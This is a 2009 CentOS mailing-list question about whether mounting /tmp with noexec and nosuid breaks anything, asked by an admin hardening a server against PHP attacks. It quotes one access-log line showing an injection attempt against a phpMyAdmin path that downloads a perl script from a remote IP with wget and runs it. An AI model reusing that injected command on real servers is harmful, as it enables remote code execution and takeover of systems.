[CentOS] Mounting /tmp nosuid,noexec

Chuck chuck.carson at gmail.com
Mon Aug 24 13:04:50 UTC 2009


Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in
solaris land forever and a day and this is a pretty standard security
measure. I noticed CentOS comes default mounting /tmp with both those
options allowed.. I'm getting constant php hack attacks against (mostly
script kiddie level stuff right now) my server and will rest much easier
with this setting in place.. We've been evaluating numerous wiki products
which are certain to have security holes as well as pypmyadmin... Seeing a
lot of crap like this:

193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET
/phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix
HTTP/1.1" 404 230

(of course I use cryptic names for my phpmyadmin install directory as well
as password protect the directory and make any sensitive config files
readable only by the web server owner)

Thx for any info
rhugga
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.centos.org/pipermail/centos/attachments/20090824/1307bf98/attachment.html>


More information about the CentOS mailing list